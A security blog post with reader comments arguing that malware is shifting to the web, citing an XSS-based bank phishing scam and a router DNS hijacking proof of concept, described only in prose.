The future of malware doesn’t belong to our hard disks.
While we’re still trying to harden our PCs against malicious executables by using unprivileged accounts, wrapping our browsers inside sandboxes and trusting antivirus programs, our digital assets are quickly moving to another place: how much of our identity and money is already on the Web? Even better, how much of our identity and money is not available somewhere on the Web yet?

Since most malware is after our identity, our money or both, why shouldn’t it follow the same path?
And if today’s malware mostly runs on Windows because it’s the commonest executable platform, tomorrow’s will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective.

I know my words may sound too much speculative, even plain FUD, but real scams and very scary proof of concepts are already here, mocking the “old school” belief that only local execution and privilege escalation are severe threats:

  • Real scamThe ultimate bank phishing using XSS.
    The credential harvesting form has been embedded inside the real bank page, served through a “secure” HTTPS connection with a valid SSL certificate, exploiting a reflected XSS vulnerability. Absolutely nothing new, and a relatively poorly performed trick too: the attackers could have as easily choose to host the whole payload inside their XSS vector itself, making their fraud even stealthier without the remote inclusion of an external resource from a different domain. But since they didn’t, surely they estimated their way is good enough to work — and it is, much more than any other phishing attempt you’ve seen so far, because this is the real bank site!!!
  • Scary Proof of ConceptMalicious web page hijacking your router.
    You may think you’ve already heard this one: “Just change the default password, it’s basic common sense” you say.
    But this time it’s different: GNUCITIZEN guys show us how to compromise your router’s DNS settings from the web with no need to log in, by exploiting its “cool” UPnP features through XmlHttpRequest (if a XSS vulnerability is available, as it happens in many devices) or Flash (if no XSS is found). And once an attacker owns your router’s DNS, he controls all your LAN, not just your own traffic…

Does anybody still believe browsing the Web with Flash and JavaScript promiscuously enabled and no XSS protection is a good idea?

6 Responses to “Malware 2.0 is Now!”

  1. #1 zomo says:

    No doubt, Web is already the main target now.Everything we did with our desktops , we do it now over the web including commonalities like spreadsheets etc.

  2. #2 Onyx says:

    No I don’t believe in browsing the web without noscript on 24/7 blocking all content by default.

  3. #3 Steve Miller says:

    Great site, but why is the first page wider than my screen, therefore forcing me to horizontally scroll for reading all? (looking at the comments scales it, making it more user friendly.)

    BTW: The Captcha test failed with my freshly installed NoScript. It told me “You’re a human! Please enter the following code in to the text box below:”; there was a window with a random looking string; submit consequently failed.

    Obviously being able to post a comment needs JavaScript; I would have expected that a (rightfully) advocate of having them turned off would not use them :-) (No offense! Only an observation; I am sure you have good reasons for using them)

  4. #4 Giorgio says:

    @Steve Miller:
    Thank you for reporting the excessive width of the main page: it was caused by my “Merry XSSMas” post, whose final greeting was a long cryptic URL which couldn’t be wrapped. Now it’s fixed :)

    Regarding my captcha (which is the famous ReCaptcha service), it has a scriptless fallback, which does work: in facts, I’m currently using it to submit this comment.
    Some reasons why it may fail:

    1. You’ve got IFRAMEs disabled (not your case, as you could see the captcha)
    2. You’ve got cookies disabled (you need to accept cookies from recaptcha.net, which are used to maintain current captcha state)
    3. You didn’t copy the whole code (admittedly, the textarea size sucks, hiding half of the validation string)

    I wish I could find the time to set up a self-hosted scriptless captcha, but until then I guess I must live with this one…

  5. #5 silveralfa says:

    I can only think of 2 good reasons to go around without your e-armor. 1) To phish for hackers and such, using a program that records attacks, but is not preventing them, on a dedicated “screwing around” kind of PC which is expendable. And then…what could you do with tracing their sources? You might also like to watch the programs compete to do the most damage. 2) To test the effectiveness of anti-whatever programs, having created a truly infested machine for them to play on. I think I know why Java is “Java” script … not only do the coders stay up all night with lots of java, but it “brews” trouble, and causes us to need lots of java whilst fixing the problems!

  6. #6 » You Suck at Web Security riahmat1c says:

    […] The only reason I stumbled into actual web security consciousness was because of some catchy headline in the search results fro a totally unrelated query. Gareth’s post about JavaScript hacking immediately appealed to the coder in me. The strange looking mangling of the language was oddly appealing. “How the heck does that still run!”, I thought. It was only after exploring the blog a bit more and the others it linked to did the situation begin to sink in. This was a whole other face of web applications I had never known about. It’s shocking that such a fundamental part had totally escaped me for so long (perhaps some people are just lazy, but I plead ignorance). “if today’s malware mostly runs on Windows because it’s the commonest executable platform, tomorrow’s will likely run on the Web, for the very same reason. Because, like it or not, Web is already a huge executable platform, and we should start thinking at it this way, from a security perspective.” Giorgio Maone […]

Bad Behavior has blocked 3590 access attempts in the last 7 days.